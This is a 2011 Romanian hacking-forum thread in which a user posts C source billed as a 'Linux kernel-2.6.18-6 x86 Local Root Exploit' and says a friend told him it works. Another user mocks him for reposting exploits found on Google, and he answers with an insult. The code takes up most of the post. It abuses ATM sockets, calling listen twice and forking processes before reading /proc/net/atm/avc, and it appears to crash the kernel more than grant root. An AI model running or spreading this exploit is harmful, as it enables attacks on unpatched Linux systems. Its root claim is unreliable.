gogusan Posted October 29, 2011 Report Posted October 29, 2011 ====================================================Linux kernel-2.6.18-6 x86 Local Root Exploit====================================================1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=00 _ __ __ __ 11 /' \ __ /'__`\ /\ \__ /'__`\ 00 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 11 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 00 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 11 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 00 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 11 \ \____/ >> Exploit database separated by exploit 00 \/___/ type (local, remote, DoS, etc.) 11 10 [+] Site : http://www.icp.com 01 [+] Support e-mail : submit[at]1337day.com 10 01 ######################################### 10 Indian Cyber Pyrates 11 ######################################### 00-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#########################################################################include <stdio.h>#include <stdlib.h>#include <string.h>#include <fcntl.h>#include <linux/atm.h>#include <sys/types.h>#include <sys/socket.h>#include <sys/stat.h>#define NUM_CPUS 8#define ATM "/proc/net/atm/avc"intmain(void){char *err, adurit[2000];int i, ret, sock, proc;struct atm_qos dj;struct sockaddr_atmsvc addr;sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);memset(&dj, 0, sizeof(dj));dj.rxtp.traffic_class = ATM_UBR;dj.txtp.traffic_class = ATM_UBR;dj.aal = ATM_NO_AAL;ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &dj, sizeof(dj));if (ret == -1) {printf("failed !\n");return 1;}memset(&addr, 0, sizeof(addr));addr.sas_family = AF_ATMSVC;bind(sock, (struct sockaddr *) &addr, sizeof(addr));listen(sock, 10);listen(sock, 10);for (i = 1; i < NUM_CPUS; ++i) {if (fork() != 0) {break;}}proc = open(ATM, O_RDONLY);ret = read(proc, &adurit, 2000);close(proc);return 0;}Sursa: YM! de la un amic Quote
doarsafur Posted October 29, 2011 Report Posted October 29, 2011 (edited) Let me google that for youDe la prietenul meu! .!. tie.LE : Ii public ma orbete. Toti stim sa cautam pe google.LE : Deci daca nu iei toate exploiturile gasite pe google si le postezi aici sa faci posturi ne suparam. Edited October 29, 2011 by doarsafur Quote
gogusan Posted October 29, 2011 Author Report Posted October 29, 2011 mi-a zis ca merge, si l-am cerut si eu.e vreo problema? .!. lamamitau Quote